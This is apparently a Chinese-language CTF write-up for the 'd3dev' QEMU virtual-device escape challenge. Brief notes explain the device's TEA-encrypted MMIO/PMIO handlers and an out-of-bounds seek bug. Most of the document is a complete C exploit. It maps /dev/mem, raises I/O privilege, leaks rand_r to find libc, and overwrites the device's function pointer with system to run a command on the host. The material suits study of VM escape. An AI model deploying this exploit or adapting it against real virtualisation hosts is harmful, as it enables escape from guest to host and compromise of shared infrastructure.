绿
设备叫d3dev
两个id
一个mmio 一个pmio
结构体
看起来像tea
#define DELTA 0x9e3779b9

/* One Feistel half-step shared by both block words:
 * (((x << 4) ^ (x >> 5)) + x) XORed with the key-dependent term k. */
static unsigned int xtea_mix(unsigned int x, unsigned int k)
{
    return (((x << 4) ^ (x >> 5)) + x) ^ k;
}

/* Encrypt the 64-bit block v[0..1] in place with the 128-bit key key[0..3].
 * 32 rounds (the count the cipher's authors recommend). The key word for each
 * half-step is chosen by sum & 3 and (sum >> 11) & 3, which is the XTEA key
 * schedule rather than original TEA's fixed k0..k3 pairing. */
void tea_encrypt(unsigned int* v, unsigned int* key) {
    unsigned int y = v[0];
    unsigned int z = v[1];
    unsigned int sum = 0;
    int round = 0;
    while (round < 32) {
        y += xtea_mix(z, sum + key[sum & 3]);
        sum += DELTA;                               /* accumulate the round constant */
        z += xtea_mix(y, sum + key[(sum >> 11) & 3]);
        round++;
    }
    v[0] = y;
    v[1] = z;
}
/* Inverse of tea_encrypt: the same 32 XTEA-style rounds are undone in reverse
 * order, starting from the value sum has after encryption (32 * delta mod 2^32)
 * and subtracting what each half-step added. v[0..1] holds the ciphertext block
 * and receives the plaintext; key[0..3] is the 128-bit key. */
void tea_decrypt(unsigned int* v, unsigned int* key) {
    const unsigned int delta = 0x9e3779b9u;       /* same constant as DELTA */
    unsigned int y = v[0], z = v[1];
    unsigned int sum = delta * 32u;               /* sum after 32 encryption rounds */
    for (int round = 32; round > 0; round--) {
        unsigned int y_mix = ((y << 4) ^ (y >> 5)) + y;
        z -= y_mix ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        unsigned int z_mix = ((z << 4) ^ (z >> 5)) + z;
        y -= z_mix ^ (sum + key[sum & 3]);
    }
    v[0] = y;
    v[1] = z;
}
所以看起来它干的事情就是用tea算法解密指定位置上的内容。
mmio_write
也有tea
看起来就是把指定位置的数拿出来tea加密一下再写回去
pmio_read
看起来比较玄乎
看一下汇编就会比较清晰
简单说就是我们可以把四个key读出来。
pmio_write
可以设置seek来导致越界
可以执行rand_r函数
思路还是比较简单的
就是利用越界读写,读出rand_r的地址,从而拿到libc,然后再把system写进去
就可以了
exp
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <sys/ioctl.h>
#include <sys/io.h>
#define _DWORD uint32_t
/* Lvalue view of the low 32 bits of x (decompiler-style helper); reinterprets
 * x's address as a uint32_t pointer. NOTE(review): this type-puns through a
 * pointer cast and assumes little-endian layout — confirm for the target. */
#define LODWORD(x) (*((_DWORD *)&(x)))
//cat /sys/devices/pci0000\:00/0000\:00\:03.0/resource0
uint32_t mmio_addr = 0xfebf1000;  // physical base of the device's MMIO region (presumably taken from the resource file above)
uint32_t mmio_size = 0x800;       // number of bytes mapped from mmio_addr
size_t port_addr = 0xc040;        // base of the device's port I/O range; pmio_read/pmio_write add their offset to it
u_int32_t key[4];                 // four 32-bit key words, filled by pmio_read() in main
unsigned char* mmio_mem;          // user-space mapping of the MMIO region, set by mem_map() in main
/* Print msg followed by the current errno description, then terminate.
 * NOTE(review): exit() is declared in <stdlib.h>, which this file does not include. */
void die(const char* msg)
{
perror(msg);
exit(-1);
}
/* Open dev and map size bytes of it, starting at file offset offset, as a
 * shared read/write mapping. Returns the mapped address, or 0 if open() fails.
 * The descriptor is closed once the mapping exists; that does not tear the
 * mapping down.
 * NOTE(review): mmap() reports failure as MAP_FAILED ((void *)-1), not NULL, so
 * the `!result` test below never detects a failed mapping; on that early-return
 * path fd would also be leaked. */
void* mem_map( const char* dev, size_t offset, size_t size )
{
int fd = open( dev, O_RDWR | O_SYNC );
if ( fd == -1 ) {
return 0;
}
void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset );
if ( !result ) {
return 0;
}
close( fd );
return result;
}
/* Read the single byte at byte offset addr of the MMIO mapping and return it
 * widened to 64 bits. Only a uint8_t is dereferenced, so the upper 56 bits of
 * the return value are always zero. */
uint64_t mmio_read(uint64_t addr)
{
return *((uint8_t*) (mmio_mem+addr));
}
/* Store value with one 64-bit write at byte offset addr of the MMIO mapping.
 * NOTE(review): the uint64_t* cast assumes addr is 8-byte aligned. */
void mmio_write(uint64_t addr, uint64_t value)
{
*( (uint64_t *) (mmio_mem+addr) ) = value;
}
/* 32-bit port write of val to port_addr + port (outl). Needs the iopl(3)
 * performed in main. */
void pmio_write(size_t port, u_int32_t val)
{
outl(val, port_addr + port);
}
/* 32-bit port read from port_addr + port (inl), returned widened to size_t.
 * Needs the iopl(3) performed in main. */
size_t pmio_read(size_t port)
{
return inl(port_addr + port);
}
/* Decrypt the 64-bit value m with the global key[] (filled by main) and return
 * the result; both 32-bit halves are also printed. The round structure is that
 * of classic TEA decryption, not the XTEA-style key schedule of
 * tea_encrypt/tea_decrypt above: the high word (result) is updated from the low
 * word (v5) with key[2]/key[3], then the low word from the high with
 * key[0]/key[1]. v4 plays the role of sum: it starts at -957401312, whose bit
 * pattern is 0xC6EF3720 (32 * DELTA mod 2^32), and 1640531527 (0x61C88647,
 * i.e. -DELTA mod 2^32) is added each round, so the loop stops after exactly
 * 32 rounds when v4 reaches 0.
 * NOTE(review): v4 is a signed int and these additions wrap past INT_MAX, which
 * is signed overflow (undefined behaviour in C); this decompiler-shaped code
 * relies on two's-complement wraparound. */
size_t tea(size_t m)
{
uint64_t v3;
signed int v4; // round constant accumulator ("sum"), see above
unsigned int v5; // low 32 bits of the block
uint64_t result; // high 32 bits of the block; only its low dword is rewritten, via LODWORD
v3 = m;
v4 = -957401312;
v5 = v3;
result = v3 >> 32;
do
{
LODWORD(result) = result - ((v5 + v4) ^ (key[3] + (v5 >> 5)) ^ (key[2] + 16 * v5));
v5 -= (result + v4) ^ (key[1] + ((unsigned int)result >> 5)) ^ (key[0] + 16 * result);
v4 += 1640531527;
} while (v4);
printf("0x%lx\n", v5); // NOTE(review): %lx with an unsigned int is a format/type mismatch
printf("0x%lx\n", result);
return result << 32 | (u_int64_t)v5;
}
/* Driver for the writeup's "exp": maps the device's MMIO region through
 * /dev/mem, enables port I/O, then performs the steps described in the text
 * above.
 * NOTE(review): system() and exit() are declared in <stdlib.h>, which this file
 * does not include. */
int main()
{
system( "mknod -m 660 /dev/mem c 1 1" ); // create the /dev/mem character node (major 1, minor 1)
mmio_mem = mem_map( "/dev/mem", mmio_addr, mmio_size );
if ( !mmio_mem ) {
die("mmap mmio failed");
}
if (iopl(3) != 0) // raise the I/O privilege level so inl/outl are allowed
{
puts("iopl fail!");
exit(-1);
}
pmio_write(8, 0x100);
mmio_write(8, 0);
mmio_write(0x18, 0);
u_int32_t tmp;
u_int64_t rand_addr;
u_int64_t libc_base, system_addr;
rand_addr = mmio_read(0x18); // NOTE(review): mmio_read() dereferences a single byte, and both halves come from offset 0x18 — confirm against the device's read semantics
rand_addr += ((u_int64_t)mmio_read(0x18)) << 32;
libc_base = rand_addr - 0x59630; // presumably rand_r's offset in the target libc (see the text above) — verify
system_addr = libc_base + 0x76890; // presumably system's offset in the same libc — verify
printf("libc 0x%llx\n", libc_base); // NOTE(review): %llx with a u_int64_t is a format/type mismatch on LP64
key[0] = pmio_read(12);
key[1] = pmio_read(16);
key[2] = pmio_read(20);
key[3] = pmio_read(24);
u_int64_t t = tea(system_addr); // the text above says mmio_write encrypts with the device key, so the value is run through the decrypt first
mmio_write(0x18, t & 0xffffffff);
mmio_write(0x18, t >> 32);
char *payload = "cat flag";
tmp = tmp = *((u_int32_t *)payload + 1); // bytes 4..7 of payload; the double assignment is redundant
pmio_write(8, 0);
mmio_write(0, tmp);
tmp = *(u_int32_t *)payload; // bytes 0..3 of payload
printf("0x%lx", tmp); // NOTE(review): %lx with a 32-bit value is a format/type mismatch
pmio_write(28, tmp);
return 0;
}